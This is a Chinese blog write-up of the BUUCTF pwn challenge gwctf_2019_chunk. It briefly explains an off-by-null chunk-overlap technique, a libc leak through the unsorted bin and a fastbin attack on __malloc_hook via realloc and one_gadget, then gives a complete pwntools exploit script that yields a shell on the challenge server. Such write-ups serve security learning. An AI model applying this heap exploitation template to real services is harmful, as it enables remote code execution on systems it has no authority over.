（BUUCTF）gwctf_2019_chunk

最新推荐文章于 2024-08-13 15:26:49 发布

LtfallQwQ

最新推荐文章于 2024-08-13 15:26:49 发布

阅读量53

点赞数

分类专栏： pwn_writeup 文章标签：网络安全系统安全安全

本文链接：https://blog.csdn.net/xy1458214551/article/details/135003795

版权

pwn_writeup 专栏收录该内容

25 篇文章 0 订阅

订阅专栏

文章目录

前置知识
整体思路
exp

前置知识

off-by-null制作三明治结构，即大-小-大的chunk，然后通过off-by-null小的，同时写第二个大的prev_size，来使得三个chunk合并为一个，再申请回第一个大的，此时小的会被写unsortedbin，泄露出libc，再申请回小的，就有重叠指针可以打fastbin attack
fastbin attack，打错位0x7f
realloc_hook调整栈帧打one_gadget

整体思路

总体来说就是利用off-by-null来泄露libc和重叠指针，比较白给。假如不了解off-by-null利用的话，可以跟着exp慢慢写一遍，这类模板题就都明白了。

exp

from pwn import *
from LibcSearcher import *

filename = './gwctf_2019_chunk'
context(log_level='debug')
local = 0
all_logs = []
elf = ELF(filename)
libc = ELF('/glibc/2.23-0ubuntu11_amd64/libc.so.6')

if local:
    sh = process(filename)
else:
    sh = remote('node4.buuoj.cn', 28044)

def debug():
    for an_log in all_logs:
        success(an_log)
    pid = util.proc.pidof(sh)[0]
    gdb.attach(pid)
    pause()

choice_words = 'Your choice: '

menu_add = 1
add_index_words = 'Give me a book ID: '
add_size_words = 'how long: '
add_content_words = ''

menu_del = 3
del_index_words = 'Which one to throw?\n'

menu_show = 2
show_index_words = 'Which book do you want to show?'

menu_edit = 4
edit_index_words = 'Which book to write?'
edit_size_words = ''
edit_content_words = 'Content: '

def add(index=-1, size=-1, content=''):
    sh.sendlineafter(choice_words, str(menu_add))
    if add_index_words:
        sh.sendlineafter(add_index_words, str(index))
    if add_size_words:
        sh.sendlineafter(add_size_words, str(size))
    if add_content_words:
        sh.sendafter(add_content_words, content)

def delete(index=-1):
    sh.sendlineafter(choice_words, str(menu_del))
    if del_index_words:
        sh.sendlineafter(del_index_words, str(index))

def show(index=-1):
    sh.sendlineafter(choice_words, str(menu_show))
    if show_index_words:
        sh.sendlineafter(show_index_words, str(index))

def edit(index=-1, size=-1, content=''):
    sh.sendlineafter(choice_words, str(menu_edit))
    if edit_index_words:
        sh.sendlineafter(edit_index_words, str(index))
    if edit_size_words:
        sh.sendlineafter(edit_size_words, str(size))
    if edit_content_words:
        sh.sendafter(edit_content_words, content)

def leak_info(name, addr):
    output_log = '{} => {}'.format(name, hex(addr))
    all_logs.append(output_log)
    success(output_log)


add(index=0, size=0xf0) # 0
add(index=1, size=0x68) # 1
add(index=2, size=0xf0) # 2
add(index=3, size=0x10) # 3
delete(index=0)

payload = b'a'*0x60 + p64(0x170)
edit(index=1, content=payload)
delete(index=2)
add(index=0, size=0xf0) # 0
show(index=1)
libc_leak = u64(sh.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
leak_info('libc_leak', libc_leak)
libc.address = libc_leak - 0x3c4b78
leak_info('libc.address', libc.address)

add(index=4, size=0x68) # 4
delete(index=1)
fake_malloc_chunk = libc.address + 0x3c4aed
edit(index=4, content=p64(fake_malloc_chunk) + b'\n')
add(index=5, size=0x68) # 5
add(index=6, size=0x68) #6

one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
payload = b'a'*0xb + p64(libc.address + one_gadget[1]) + p64(libc.sym['realloc'] + 13)
edit(index=6, content=payload + b'\n')

add(index=7, size=0x40)
sh.interactive()
# debug()